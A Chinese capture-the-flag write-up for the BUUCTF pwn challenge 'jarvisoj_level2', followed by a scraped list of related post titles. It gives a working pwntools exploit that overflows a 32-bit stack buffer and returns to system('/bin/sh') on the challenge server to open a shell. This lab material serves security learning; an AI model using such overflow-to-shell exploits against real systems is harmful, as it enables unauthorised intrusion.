[BUUCTF-pwn]——jarvisoj_level2
[BUUCTF-pwn]——jarvisoj_level2
- 题目地址:https://buuoj.cn/challenges#jarvisoj_level2
checksec 一下下, 32程序
IDA中看下,发现了system函数还是两个,有可利用的栈溢出read函数,shift+F12,还发现了"/bin/sh"字符串. 所以exploit就如下
exploit
from pwn import *
p = remote("node3.buuoj.cn",28375)
binsh = 0x0804A024
sys_addr = 0x0804845C
payload = 'a' * (0x88 + 0x4) + p32(sys_addr) + p32(binsh)
p.sendlineafter("Input:\n",payload)
p.interactive()
[BUUCTF-pwn]——jarvisoj_level2相关推荐
- 持续更新 BUUCTF——PWN(一)
文章目录 前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...
- [BUUCTF]PWN16——jarvisoj_level2
[BUUCTF]PWN16--jarvisoj_level2 附件 步骤 例行检查,32位,开启了nx保护 试运行一下程序 32位ida载入,shift+f12查看一下程序里的字符串,发现了syste ...
- BUUCTF Pwn warmup
BUUCTF Pwn warmup 1.题目下载地址 2.checksec检查保护 3.IDA静态分析 4.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 啥都没开,果然是war ...
- BUUCTF PWN rip1 WP
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录. 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后 ...
- buuctf pwn bjdctf_2020_babyrop
buuctf pwn bjdctf_2020_babyrop 1.checksec 2.IDA分析 ropper 3.exp 1.checksec 运行一下 2.IDA分析 这里调用了vuln函数 我 ...
- 持续更新 BUUCTF——PWN(二)
文章目录 前言 0ctf_2017_babyheap ciscn_2019_s_9 hitcon2014_stkof roarctf_2019_easy_pwn picoctf_2018_shellc ...
- BUUCTF PWN 刷题 1-15题
1 rip 经典栈溢出漏洞. from pwn import *p = remote('node4.buuoj.cn', 27181)payload = b'a' * 23 + p64(0x40118 ...
- 持续更新 BUUCTF——PWN(三)
文章目录 前言 axb_2019_heap oneshot_tjctf_2016 护网杯_2018_gettingstart wustctf2020_number_game zctf2016_note ...
- Buuctf(pwn) picoctf_2018_rop chain 栈溢出
32位,开启了NX保护 利用思路 首先溢出后覆盖ret为function1函数地址,将win1赋值为1,之后跳转到function2的地址,a1是传入的参数,将a1传入即可满足条件去设置win2的值为 ...
- BUUCTF(pwn) jarvisoj_level4 栈溢出,泄露libc
思路 我们没有system和'/bin/sh'地址.也不知道libc版本, 我们可以先leek出来一个地址, 利用偏移找到system和'/bin/sh'地址.再返回main进行循环调用,第二次就可以 ...
最新文章
- java模拟https请求_java-用httpclient模拟发送https请求
- Android获取当前时间
- 企业内网中的WSUS更新服务 服务器连接到Microsoft Update来获取更新程序
- python手机版下载3.7.3-Python 3.7.0 来了!
- Java中异常的分类
- 图解netstat命令实例
- C 语言的实际运用 ---150809124
- lucene Field部分参数设置含义
- P5357 【模板】AC自动机(二次加强版) fail树
- 【数据结构】栈的存储实现
- 娓娓道来!那些BERT模型压缩方法(一)
- [.NET] 怎样使用 async await 一步步将同步代码转换为异步编程
- [链表|多解法] leetcode 19 删除链表的倒数第N个节点
- 2020年接近尾声,我选择来鲲鹏开发者技术峰会学点干货!
- 机器学习基础(二十三)—— 概念、定义
- IDEA使用maven helper设置自定义mvn命令
- 倪光南院士2006年9月1号在南京软件博览会上的讲话
- 强大的类似qq截图或者微信截图功能软件
- 正则表达式:回车和换行的区别
- 苹果6换android系统更新不了,iPhone6的手机系统是什么?iPhone6能升级安卓4.4吗?...
热门文章
- [论文阅读] (17)CCS2019 针对PowerShell脚本的轻量级去混淆和语义感知攻击检测(经典)
- 计算机网络的拓扑结构主要取决于它的( )
- 一入爬虫深似海,反爬技术你知多少?
- 1027:输出浮点数
- Java常用API(二)String
- 【Tiny4412】使用dnw烧写内核
- 【Android】 Android中Log调试详解
- @data注解不生效_面试官:你经常在SpringBoot中使用的条件注解底层是如何实现的?你了解过吗?...
- 计算机密码都有什么用,要不是他,你根本不会忘记密码。
- freemarker生成word模板